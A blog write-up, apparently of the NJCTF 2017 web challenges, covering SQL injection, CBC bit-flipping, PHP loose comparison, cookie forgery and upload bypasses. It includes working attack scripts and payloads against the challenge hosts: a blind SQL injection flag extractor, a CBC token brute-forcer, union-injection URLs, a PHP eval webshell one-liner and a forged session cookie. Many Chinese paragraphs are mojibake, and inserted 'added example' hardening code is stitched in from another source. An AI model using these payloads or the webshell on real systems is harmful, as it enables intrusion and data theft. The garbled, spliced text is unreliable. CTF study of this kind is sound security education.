LoRexxar's Blog

NJCTF Web section writeup

2017/03/13

It's that time of year again for competition season. This time I played NJCTF, organized by 赛宁 themselves. Here I've briefly written up the Web section. I don't know who wrote the challenges, but I think most of them were pretty dumb... readers can take whatever knowledge they want from this.


Web

Login

login?

Nothing much fun here: over-long usernames get truncated at registration.

The principle: the username is still different at check time, but the database column has a fixed length, so it gets truncated on storage. Registering an over-long username with spaces in the middle ("admin" followed by padding spaces and then other characters) is therefore truncated to admin.

Get Flag

Stop yapping, come get the FLAG
PS: delay 5s

鍛戒护鎵ц锛屾病浠涔堝ソ璇寸殑銆

After the cat, use & ls to list the files in the directory.
The flag is at ../../../9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag

Text Wall

There is a .index.php.swo file, and from it you can find the original challenge:

https://losfuzzys.github.io/writeup/2016/10/02/tumctf-web50/

Challenge source

<?php
//The flag is /var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g
$lists = [];
Class filelist{
    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_COOKIE['lists'])){
    $cookie = $_COOKIE['lists'];
    $hash = substr($cookie, 0, 40);
    $sha1 = substr($cookie, 40);
    if(sha1($sha1) === $hash){
        $lists = unserialize($sha1);
    }
}
if(isset($_POST['hiehiehie'])){
    $info = $_POST['hiehiehie'];
    $lists[] = $info;
    $sha1 = serialize($lists);
    $hash = sha1($sha1);
    setcookie('lists', $hash.$sha1);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Please Get Flag!!</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="http://apps.bdimg.com/libs/bootstrap/3.3.0/css/bootstrap.min.css">
    <script src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js"></script>
    <script src="http://apps.bdimg.com/libs/bootstrap/3.3.0/js/bootstrap.min.js"></script>
</head>
<body>
    <div class="container">
        <div class="jumbotron">
            <h1>Please Get Flag!!</h1>
        </div>
        <div class="row">
            <?php foreach($lists as $info):?>
            <div class="col-sm-4">
                <h3><?=$info?></h3>
            </div>
            <?php endforeach;?>
        </div>
        <form method="post" href=".">
            <input name="hiehiehie" value="hiehiehie">
            <input type="submit" value="submit">
        </form>
    </div>
</body>
</html>

Nothing to say: they just swapped md5 for sha1. The check only proves that the 40-character prefix is the sha1 of whatever follows it, and since no secret is involved, anyone can produce a cookie that passes and is then handed to unserialize().
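As an added example (not code from the writeup), the cookie scheme above reimplemented in Python: an unkeyed sha1 prefix lets any client rewrite the payload and recompute the "signature" itself, whereas an HMAC under a server-side key (a constructed key here) cannot be recomputed by the client. The serialized strings are constructed samples; even a valid MAC does not make unserialize() of client data safe, it only stops tampering.

```python
import hashlib
import hmac

# Challenge scheme: cookie = sha1(data) . data, no secret involved anywhere.
def make_cookie(data: bytes) -> bytes:
    return hashlib.sha1(data).hexdigest().encode() + data

def verify_cookie(cookie: bytes):
    """Return data if sha1(data) matches the 40-char prefix. Any client can satisfy this."""
    digest, data = cookie[:40], cookie[40:]
    return data if hashlib.sha1(data).hexdigest().encode() == digest else None

def client_tampers(cookie: bytes, new_data: bytes) -> bytes:
    """A client swaps in its own payload and recomputes the unkeyed hash itself."""
    return make_cookie(new_data)

# Hardened scheme: HMAC-SHA256 under a key only the server knows.
def make_signed_cookie(data: bytes, key: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).hexdigest().encode() + data

def verify_signed_cookie(cookie: bytes, key: bytes):
    """Return data only if the 64-char tag is the server-keyed MAC of the data."""
    tag, data = cookie[:64], cookie[64:]
    expected = hmac.new(key, data, hashlib.sha256).hexdigest().encode()
    return data if hmac.compare_digest(tag, expected) else None

def client_tampers_signed(cookie: bytes, new_data: bytes) -> bytes:
    """Without the key the client can only reuse the old tag over new data."""
    return cookie[:64] + new_data
```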

Be admin

There is an index.php.bak; CBC bit-flipping on the encrypted token, combined with SQL injection.

I didn't solve this one myself, so I won't go on about it; here is the script.

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script: str values are raw bytes here.
import base64
import requests
import urllib

aa = ')\xa5\xa1\xec>)F\x119\xbc\xfcor\x11\xd9\xa4'
url = "http://218.2.197.235:23737/"
cookie = {"PHPSESSID":"qe6s9hjkpqrfcv07hf1ous71m7"}
iv = ["\x00"]*16
cipher = ['\x00', 236, 46, 92, 100, 49, 71, 211, 255, 106, 69, 3, 16, 13, 233, 54]
plain = "admin"
plain += 11*chr(11)
plain = list(plain)

# for i in xrange(16,17):
#     for j in xrange(1,i):
#         iv[16-i+j] = chr(cipher[16-i+j] ^ i)
#     for x in xrange(218,256):
#         iv[16-i] = chr(x)
#         tmp_iv = "".join(iv)
#         cookie['token'] = urllib.quote(base64.b64encode(tmp_iv))
#         print cookie
#         try:
#             r = requests.get(url, cookies=cookie)
#             print "%s"%x, r.content
#         except:
#             print cipher
#             print x
#             exit();
#         if "ctfer!" in r.content:
#             break
#     else:
#         print cipher
#         exit();
#     cipher[16-i] = x ^ i
#     break
# print cipher
# for x in cipher:
#     print hex(x)

plain = ['a', '\x88', 'C', '5', '\n', ':', 'L', '\xd8', '\xf4', 'a', 'N', '\x08', '\x1b', '\x06', '\xe2', '=']
for x in xrange(193,256):
    plain[0] = chr(x)
    tmp_p = "".join(plain)
    cookie['token'] = urllib.quote(base64.b64encode(tmp_p))
    r = requests.get(url, cookies=cookie)
    print x
    print r.content

杩欓噷鍧戠壒鍒ぇ锛屾湇鍔″櫒缁忓父璺戠潃璺戠潃灏辫ban浜嗭紝鐒跺悗棰樼洰鍙堟槸蹇呴』瑕佽窇鐨

blog

Ruby web code audit

Reading it from the top, you can see the code has almost no functionality; the controllers are basically all about user, i.e. create/read/update/delete on user information.

So the problem is basically right here.


In the database the admin column is defined with a default of false, but in the registration function admin is accepted as input.


By default it is simply not supplied, and that is the problem: if you pass user[admin]=1 at registration, the account is created as admin and you can easily find the flag.

come on

杩欓鍦ㄦ瘮璧涙椂闂村唴娌¤兘鍋氬嚭鏉ワ紝浣嗗疄闄呬笂鏄垜寮辨櫤浜嗭紝棰樼洰涓嶉毦锛屽彧鏄お涔呮病瑙佷簡锛屽帇鏍规病鎯冲埌锛屽瀛楄妭娉ㄥ叆銆

Test payloads

http://218.2.197.235:23733/index.php?key=1%df%27||1=1%23
http://218.2.197.235:23733/index.php?key=1%df%27||1=2%23

But some things are filtered: union, the greater-than and less-than signs, and lots and lots of blind-injection functions; in the end only left survives, and there is a function called BINARY that can be used for the comparison.
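An added example (not code from the writeup) of why the 1%df%27 payloads above work when the application escapes bytes but the MySQL connection charset is GBK, and a charset-aware alternative. Function names are my own; the real fix on the PHP side is to escape with the connection's charset (mysqli_set_charset plus mysqli_real_escape_string) or to use prepared statements.

```python
from typing import Optional

def addslashes(data: bytes) -> bytes:
    """PHP addslashes()-style escaping: operates on raw bytes, ignoring the charset."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)          # prepend a backslash
        out.append(b)
    return bytes(out)

def build_query_naive(key: bytes) -> bytes:
    """Vulnerable pattern: escape the bytes, then splice them into a quoted literal."""
    return b"SELECT * FROM t WHERE key='" + addslashes(key) + b"'"

def as_gbk(query: bytes) -> str:
    """What a GBK-configured MySQL server parses: the bytes 0xDF 0x5C form ONE
    two-byte character, so the backslash inserted before the quote is swallowed."""
    return query.decode("gbk")

def escape_charset_aware(key: bytes) -> Optional[bytes]:
    """Decode as GBK first: a lone lead byte such as 0xDF followed by a quote is
    invalid and rejected, and escaping happens on characters, not bytes."""
    try:
        text = key.decode("gbk")
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'").encode("gbk")
```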

payload

# coding=utf-8
# Python 2 script.
import requests
import random
import hashlib

s = requests.Session()

def get_flag():
    url = 'http://218.2.197.235:23733/index.php?key=123%df%27||'
    flag = ""
    payload = "if((select(right(left((select(flag)from(flag)),{}),1)))=binary({}),1,0)%23"
    for j in range(1, 33):
        for i in range(20, 120):
            r = get_data(url + payload.format(str(j), hex(i)))
            if "002265" in r:
                flag += chr(i)
                print flag
                break

def get_data(url):
    r = s.get(url)
    return r.text

get_flag()
NJCTF{5H0W_M3_S0M3_sQ1i_TrICk5}

wallet

闈炲父鎵緱鏄祴璇曚簡寰堜箙锛岀獊鐒剁粰浜唄int璇村帇缂╁寘瀵嗙爜鏄急鍙d护锛屾墠鍙嶅簲杩囨潵鏄湁婧愮爜

http://218.2.197.235:23723/www.zip

Running ten thousand passwords was useless, because the zip password was njctf2017; you can tell how bored the challenge author was...

涓嬮潰鏄簮鐮

<?php
require_once "db.php";
$auth = 0;
if (isset($_COOKIE["auth"])) {
    $auth = $_COOKIE["auth"];
    $hsh = $_COOKIE["hsh"];
    if ($auth == $hsh) {
        $auth = 0;
    } else {
        if (sha1((string) $hsh) == md5((string) $auth)) {
            $auth = 1;
        } else {
            $auth = 0;
        }
    }
} else {
    $auth = 0;
    $s = $auth;
    setcookie("auth", $s);
    setcookie("hsh", sha1((string) $s));
}
if ($auth) {
    if (isset($_GET['query'])) {
        $db = new SQLite3($SQL_DATABASE, SQLITE3_OPEN_READONLY);
        $qstr = SQLITE3::escapeString($_GET['query']);
        $query = "SELECT amount FROM my_wallets WHERE id={$qstr}";
        $result = $db->querySingle($query);
        if (!$result === NULL) {
            echo "Error - invalid query";
        } else {
            echo "Wallet contains: {$result}";
        }
    } else {
        echo "<html><head><title>Admin Page</title></head><body>Welcome to the admin panel!<br /><br /><form name='input' action='admin.php' method='get'>Wallet ID: <input type='text' name='query'><input type='submit' value='Submit Query'></form></body></html>";
    }
} else {
    echo "Sorry, not authorized.";
}

鍓嶉潰鏄急绫诲瀷姣旇緝锛岃佹浜嗭紝杩欐鏄痵ha1鍜宮d5姣旇緝锛岄殢渚胯窇璺戝氨鏈変簡

https://www.whitehatsec.com/blog/magic-hashes/
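An added example (not from the writeup) that reimplements the admin.php check in Python with a PHP-style == so the magic-hash behaviour can be seen offline, beside a hardened check. The inputs 240610708 and aaroZmOk are published magic-hash values (md5 and sha1 digests of the form 0e...); the server key is a constructed sample.

```python
import hashlib
import hmac
import re

# PHP ==: two numeric strings are compared as numbers, so "0e123" == "0e456" is true.
# Simplified numeric-string grammar, enough for hex digests.
PHP_NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")

def php_loose_eq(a: str, b: str) -> bool:
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b

def wallet_auth(auth: str, hsh: str) -> int:
    """The challenge logic: auth != hsh, yet sha1(hsh) == md5(auth) under loose comparison."""
    if php_loose_eq(auth, hsh):
        return 0
    sha = hashlib.sha1(hsh.encode()).hexdigest()
    md = hashlib.md5(auth.encode()).hexdigest()
    return 1 if php_loose_eq(sha, md) else 0

def issue_auth(server_key: bytes):
    """Hardened issuance: auth flag plus an HMAC over it under a server-only key."""
    auth = "1"
    return auth, hmac.new(server_key, auth.encode(), hashlib.sha256).hexdigest()

def wallet_auth_fixed(auth: str, hsh: str, server_key: bytes) -> int:
    """Hardened check: recompute the MAC and compare it strictly (hash_equals semantics)."""
    expected = hmac.new(server_key, auth.encode(), hashlib.sha256).hexdigest()
    return 1 if auth == "1" and hmac.compare_digest(expected, hsh) else 0
```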

Next comes the SQLite injection. Normally when injecting a SQLite database we read the CREATE TABLE statements and table names from sqlite_master, but here the sql column was removed, so only the table names come back.

There are two tables in total, flag and my_wallets; the remaining question is the column names... I tried many approaches but none of them worked in SQLite, and in the end I casually tried id...

http://218.2.197.235:23723/admin.php?query=-1 union SELECT id FROM flag
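An added example (not the challenge's own code) using Python's sqlite3 to show why escapeString does not help here: it only doubles single quotes, and the value is spliced into an unquoted numeric position, so the union above still reaches the flag table. The tables and the flag value are constructed samples; the fixed version binds a validated integer.

```python
import sqlite3

def escape_string(s: str) -> str:
    """SQLITE3::escapeString only doubles single quotes; it never adds quotes around the value."""
    return s.replace("'", "''")

def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE my_wallets (id INTEGER PRIMARY KEY, amount INTEGER);
        CREATE TABLE flag (id TEXT);
        INSERT INTO my_wallets VALUES (1, 100);
        INSERT INTO flag VALUES ('NJCTF{constructed_sample_flag}');
    """)
    return db

def query_vulnerable(db: sqlite3.Connection, user_input: str):
    """admin.php's pattern: escaped but unquoted, so 'id=-1 union SELECT ...' parses as SQL."""
    qstr = escape_string(user_input)
    try:
        row = db.execute(f"SELECT amount FROM my_wallets WHERE id={qstr}").fetchone()
    except sqlite3.Error:
        return "Error - invalid query"
    return row[0] if row else None

def query_fixed(db: sqlite3.Connection, user_input: str):
    """Validate the type, then bind it as a parameter; the union is no longer SQL."""
    try:
        wallet_id = int(user_input)
    except ValueError:
        return None
    row = db.execute("SELECT amount FROM my_wallets WHERE id=?", (wallet_id,)).fetchone()
    return row[0] if row else None
```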

Be Logical

I'll write this one up later.

pictures wall

鎰熻鏄釜寮辨櫤棰樼洰锛岄鍏堟槸闇瑕佺櫥褰曚负root锛屼絾鏄殢渚跨櫥褰曡繘鍘荤殑鏄釜娌$敤鐨勮处鎴凤紝浠涔堥兘鏀逛笉浜嗭紝缁撴灉鏄湪鐧诲綍鐨勬椂鍊欎慨鏀筯ost涓127.0.0.1锛屼粠浠g爜閲岀湅鏄繖鏍风殑

<?php
require_once("./waf.php");
if(isset($_POST["username"]) && isset($_POST["password"])){
    session_start();
    $ip = $_SERVER['HTTP_HOST'];
    if($ip == "::1" || $ip == "127.0.0.1"){
        $_SESSION["token"] = "0";
        header("Location: index.php");
    }else{
        $key = $_POST["username"] . "~:" . $_POST["password"];
        $_SESSION["token"] = base64_encode($key);
        header("Location: index.php");
    }
}else{
    header("Location: login.html");
    exit();
}
?>

鐒跺悗鏄叧閿儴鍒嗕簡锛屼篃灏辨槸缁曡繃涓婁紶鏂囦欢鐨剋af锛岃繖閲屽畬鍏ㄦ槸鐧藉悕鍗曟娴嬬殑锛屽彧鏈塸html鍙互涓嶈鏀瑰悕


...puzzling code. Upload an image, change the extension to phtml, and append after the image data:

<script language="php"> @eval($_POST[ddog])</script>

getshell

chall 1 2

Honestly the original challenge was a decent one, but for some reason it was forcibly split into two, with some guesswork forced in...

鍋氶鑳芥壘鍒板師棰樼殑wp
https://www.smrrd.de/nodejs-hacking-challenge-writeup.html

浣嗛鐩湁鏀硅繃锛屾祴璇曚簡涓嬪簲璇ユ槸鍦╟heck瀵嗙爜鐨勬椂鍊欒繃浜嗕竴灞俶d5锛屽湪nodejs涓紝鍔犲瘑鍑芥暟鍙帴鍙楀瓧绗︿覆鍜宐uffer锛屾墍浠ュ師棰樼殑瑙f硶浼犲叆鏁板瓧灏变細鎶ラ敊銆

There's a magical trick here: in Node.js, if a string consists entirely of digits, the string turns into a number (seriously...).

蓝猫 says there is no such thing... this is not the same as the '1'==1 principle. Here it's because I was blindly guessing at the source: searching GitHub for bibibibibi or similar turns up the real code, and there the value goes through parseInt, which is why the string becomes a number.

import hashlib

# Search upward from 100000 for the first number whose md5 hex digest
# contains no letters a-f, i.e. is made of decimal digits only.
n = 100000
while True:
    digest = hashlib.md5(repr(n).encode()).hexdigest()
    if not any(c in digest for c in "abcdef"):
        print(n)
        break
    n += 1

It quickly found 1518375; then I started searching the data in the buffer... the annoying part was that the flag was scarce; I dumped about 1 MB of text data before finding it.

Next comes the biggest guessing problem. The flag found above looks like this:

NJCTF{P1e45e_s3arch_th1s_s0urce_cod3_0lddriver}

But in fact the second challenge follows the original's idea, and flag1 is the secretkey; yet the challenge gives no source code...

涔熷氨鏄鏋滀綘鎯冲仛鍑虹浜岄锛岄渶瑕佷笂缃戞壘鍒板師棰樼殑wp锛岀劧鍚庝笅杞戒唬鐮侊紝鏈湴鎼缓鐒跺悗淇敼榛樿涓篴dmin:yes锛屾妸cookie浠e叆绾夸笂绔欙紝getflag2鈥.

session=eyJhZG1pbiI6InllcyJ9; session.sig=DLXp3JcD1oX3c8v4pUgOAn-pDYo

Guess

鎸虹壒鍒殑涓棰橈紝鍏跺疄澶ч儴鍒嗘濊矾閮藉拰hctf涓殑鍏佃呭璇′竴鏍凤紝浣嗘槸杩欐鐨勯毦鐐瑰湪浜庯紝鏂囦欢鍚嶆湭鐭ワ紝鎴戜滑鏉ョ湅鐪嬩唬鐮

upload.php
<?php
error_reporting(0);
function show_error_message($message)
{
    die("<div class=\"msg error\" id=\"message\">
        <i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
}
function show_message($message)
{
    echo("<div class=\"msg success\" id=\"message\">
        <i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
}
function random_str($length = "32")
{
    $set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",
        "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",
        "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",
        "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",
        "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $str = '';
    for ($i = 1; $i <= $length; ++$i) {
        $ch = mt_rand(0, count($set) - 1);
        $str .= $set[$ch];
    }
    return $str;
}
session_start();
$reg='/gif|jpg|jpeg|png/';
if (isset($_POST['submit'])) {
    $seed = rand(0,999999999);
    mt_srand($seed);
    $ss = mt_rand();
    $hash = md5(session_id() . $ss);
    setcookie('SESSI0N', $hash, time() + 3600);
    if ($_FILES["file"]["error"] > 0) {
        show_error_message("Upload ERROR. Return Code: " . $_FILES["file-upload-field"]["error"]);
    }
    $check1 = ((($_FILES["file-upload-field"]["type"] == "image/gif")
        || ($_FILES["file-upload-field"]["type"] == "image/jpeg")
        || ($_FILES["file-upload-field"]["type"] == "image/pjpeg")
        || ($_FILES["file-upload-field"]["type"] == "image/png"))
        && ($_FILES["file-upload-field"]["size"] < 204800));
    $check2=!preg_match($reg,pathinfo($_FILES['file-upload-field']['name'], PATHINFO_EXTENSION));
    if ($check2) show_error_message("Nope!");
    if ($check1) {
        $filename = './uP1O4Ds/' . random_str() . '_' . $_FILES['file-upload-field']['name'];
        if (move_uploaded_file($_FILES['file-upload-field']['tmp_name'], $filename)) {
            show_message("Upload successfully. File type:" . $_FILES["file-upload-field"]["type"]);
        } else show_error_message("Something wrong with the upload...");
    } else {
        show_error_message("only allow gif/jpeg/png files smaller than 200kb!");
    }
}
?>
index.php
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Upload</title>
    <link rel="stylesheet" href="http://fortawesome.github.io/Font-Awesome/assets/font-awesome/css/font-awesome.css">
    <link rel="stylesheet" href="CSS/upload.css">
</head>
<body>
    <div class="msg info" id="message">
        <i class="fa fa-info-circle"></i>please upload an IMAGE file (gif|jpg|jpeg|png)
    </div>
    <div class="container">
        <form action="?page=upload" method="post" enctype="multipart/form-data" class="form">
            <div class="file-upload-wrapper" id="file" data-text="Select an image!">
                <label for="file-upload"> <input name="file-upload-field" type="file" class="file-upload-field" value=""
                    id="file-upload"></label>
            </div>
            <div class="div">
                <input class="button" type="submit" value="Upload Image" name="submit">
            </div>
        </form>
        <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
        <script src="js/filename.js"></script>
    </div>
</body>
</html>
<?php
error_reporting(0);
session_start();
if(isset($_GET['page'])){
    $page=$_GET['page'];
}else{
    $page=null;
}
if(preg_match('/\.\./',$page))
{
    echo "<div class=\"msg error\" id=\"message\">
        <i class=\"fa fa-exclamation-triangle\"></i>Attack Detected!</div>";
    die();
}
?>
<?php
if($page)
{
    if(!(include($page.'.php')))
    {
        echo "<div class=\"msg error\" id=\"message\">
            <i class=\"fa fa-exclamation-triangle\"></i>error!</div>";
        exit;
    }
}
?>

寰堝鏄撶湅鍒伴棶棰樹簡锛屽鏋滄垜浠兂瑕佺煡閬撴枃浠跺悕锛岄偅灏卞彧鑳界垎鐮撮殢鏈烘暟绉嶅瓙锛岀湅涓婂幓寰堝ぇ锛屼簨瀹炰笂鏄兘鐖嗙牬鍑烘潵鐨
